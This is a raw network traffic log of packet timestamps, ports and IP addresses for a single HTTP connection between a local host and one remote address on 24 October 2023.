Oct 24, 2023 00:06:44.113493919 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113569021 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113579035 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113641024 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113663912 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113720894 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113850117 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113882065 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113936901 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113954067 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113986969 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113990068 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114057064 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114061117 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114092112 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114123106 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114152908 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114156008 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114183903 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114214897 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114245892 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114254951 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114281893 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114315033 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114321947 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114346027 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114377022 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114387035 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114443064 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114507914 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114538908 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114573002 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114595890 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114645004 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114696026 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114748955 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114797115 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114826918 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114857912 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114869118 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114887953 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114934921 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114959955 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.114985943 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.114990950 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115021944 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115052938 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115073919 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115123987 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115134954 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115199089 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115278959 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115312099 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115341902 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115362883 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115372896 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115402937 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115425110 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115477085 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115489006 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115508080 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115561008 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115616083 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115660906 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115693092 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115724087 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115735054 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115796089 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115813971 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115828037 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115879059 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115900040 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115930080 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115936995 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.115961075 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.115994930 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.116058111 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.148701906 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.148729086 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.148772955 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.148802042 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.148889065 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.148955107 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.194003105 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.194056988 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.194091082 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.194124937 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.194155931 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.194185972 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.194217920 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.194248915 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.194278002 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.194399118 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.206212997 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.206291914 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.206329107 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.206331015 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.206362009 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.206384897 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.206485033 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.206526041 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.206598997 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.206643105 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.206710100 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.206949949 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.207026958 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.207149982 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.207252026 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.207262039 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.207335949 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.207571030 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.207602978 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.207657099 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.207710028 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.207715034 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.207818985 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.207827091 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.207905054 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.208336115 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.208410025 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.208489895 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.208560944 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.210604906 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.210643053 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.210675001 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.210679054 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.210709095 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.210740089 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.210766077 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.210838079 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.210839033 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.210911989 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.211275101 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211361885 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.211388111 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211462975 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211469889 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.211494923 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211525917 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211556911 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211560965 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.211591959 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211622953 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211654902 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211671114 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.211684942 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211736917 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.211743116 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.211821079 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.212122917 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.212207079 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.212272882 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.212316990 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.212336063 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.212347984 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.212421894 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.212857008 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.212965012 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.241997957 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.242060900 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.242095947 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.242130041 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.242161989 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.242192984 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.242259026 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.242294073 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.287875891 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.287934065 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.287966967 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.287998915 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288031101 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288064003 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288095951 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288127899 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288161039 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288192034 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288223982 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288254023 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288285017 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288316965 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288347960 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.288379908 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300015926 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300049067 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300079107 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300379038 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300412893 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300442934 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300472975 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300503969 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300533056 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300565004 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300595999 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300626993 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300682068 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300712109 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300743103 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300772905 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300805092 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300836086 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300865889 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300896883 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300928116 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.300957918 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301084042 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301115036 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301145077 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301266909 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301297903 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301327944 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301358938 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301389933 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301422119 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301453114 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301484108 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301537037 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301569939 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301600933 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301630974 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301661968 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301692963 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301723003 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301754951 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301784992 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.301815987 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.303936005 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.304569960 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.304703951 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.314605951 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.314636946 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.314747095 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.314841032 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.314872026 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.314946890 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.314979076 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315010071 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315071106 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315102100 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315133095 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315162897 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315262079 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315347910 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315380096 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315409899 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315439939 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315469980 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315500975 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315674067 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315704107 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315736055 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315805912 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315924883 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315956116 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.315985918 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316016912 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316173077 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316203117 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316234112 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316337109 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316368103 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316397905 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316623926 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316839933 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316870928 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316901922 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316931009 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.316987991 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317018986 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317049026 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317291975 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317323923 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317389011 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317420006 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317450047 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317481995 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317512035 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317543030 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317612886 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317728996 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317760944 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317791939 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317822933 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317903996 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317934036 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317965031 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.317995071 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318073034 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318104029 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318202019 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318276882 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318310022 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318341017 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318372011 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318512917 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318543911 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318577051 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318607092 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318677902 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318708897 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318738937 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318828106 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318859100 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318890095 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318919897 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.318988085 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319103956 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319138050 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319170952 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319201946 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319232941 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319262028 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319293976 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319324970 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319355011 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319406033 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319437981 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319502115 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319533110 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319645882 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319678068 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319709063 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319739103 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.319768906 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320072889 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320103884 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320133924 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320164919 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320195913 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320290089 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320321083 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320352077 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320420027 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.320475101 CEST	80	49776	104.21.92.91	192.168.2.4
